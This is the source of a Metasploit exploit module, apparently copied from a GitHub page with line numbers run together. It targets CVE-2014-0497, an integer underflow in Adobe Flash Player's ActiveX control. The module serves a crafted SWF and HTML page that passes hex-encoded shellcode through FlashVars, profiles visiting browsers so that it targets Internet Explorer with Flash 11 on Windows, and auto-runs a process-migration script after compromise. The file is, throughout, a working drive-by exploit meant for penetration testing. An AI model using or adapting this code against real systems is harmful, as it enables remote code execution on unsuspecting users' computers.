Path: blob/master/modules/exploits/windows/browser/adobe_flash_avm2.rb
19812 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::BrowserExploitServer910def initialize(info = {})11super(12update_info(13info,14'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",15'Description' => %q{16This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player17before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an18integer underflow in several avm2 instructions, which can be turned into remote code19execution under the context of the user, as exploited in the wild in February 2014. This20module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP21SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes22rop chains for several Flash 11 versions, as exploited in the wild.23},24'License' => MSF_LICENSE,25'Author' => [26'Unknown', # vulnerability discovery and exploit in the wild27'juan vazquez' # msf module28],29'References' => [30[ 'CVE', '2014-0497' ],31[ 'OSVDB', '102849' ],32[ 'BID', '65327' ],33[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],34[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ]35],36'Payload' => {37'Space' => 1024,38'DisableNops' => true39},40'DefaultOptions' => {41'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',42'Retries' => false43},44'Platform' => 'win',45# Versions targeted in the wild:46# [*] Windows 8:47# 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,1448# 11,6,602,167, 11,6,602,171 ,11,6,602,18049# 11,7,700,169, 11,7,700,202, 11,7,700,22450# [*] Before windows 8:51# 11,0,1,152,52# 11,1,102,55, 11,1,102,62, 11,1,102,6353# 11,2,202,228, 11,2,202,233, 11,2,202,23554# 11,3,300,257, 11,3,300,27355# 11,4,402,27856# 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,14957# 11,6,602,168, 11,6,602,171, 11,6,602,18058# 11,7,700,169, 11,7,700,20259# 11,8,800,97, 11,8,800,5060'BrowserRequirements' => {61:source => /script|headers/i,62:activex => [63{64clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}',65method: 'LoadMovie'66}67],68:os_name => OperatingSystems::Match::WINDOWS,69:ua_name => Msf::HttpClients::IE,70:flash => lambda { |ver| ver =~ /^11\./ }71},72'Targets' => [73[ 'Automatic', {} ]74],75'Privileged' => false,76'DisclosureDate' => '2014-02-05',77'DefaultTarget' => 0,78'Notes' => {79'Reliability' => UNKNOWN_RELIABILITY,80'Stability' => UNKNOWN_STABILITY,81'SideEffects' => UNKNOWN_SIDE_EFFECTS82}83)84)85end8687def exploit88@swf = create_swf89super90end9192def on_request_exploit(cli, request, target_info)93print_status("Request: #{request.uri}")9495if request.uri =~ /\.swf$/96print_status("Sending SWF...")97send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Pragma' => 'no-cache' })98return99end100101print_status("Sending HTML...")102tag = retrieve_tag(cli, request)103profile = browser_profile[tag]104profile[:tried] = false unless profile.nil? # to allow request the swf105send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })106end107108def exploit_template(cli, target_info)109swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"110shellcode = get_payload(cli, target_info).unpack("H*")[0]111112html_template = %Q|<html>113<body>114<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />115<param name="movie" value="<%=swf_random%>" />116<param name="allowScriptAccess" value="always" />117<param name="FlashVars" value="id=<%=shellcode%>" />118<param name="Play" value="true" />119</object>120</body>121</html>122|123124return html_template, binding()125end126127def create_swf128path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf")129swf = ::File.open(path, 'rb') { |f| swf = f.read }130131swf132end133end134135136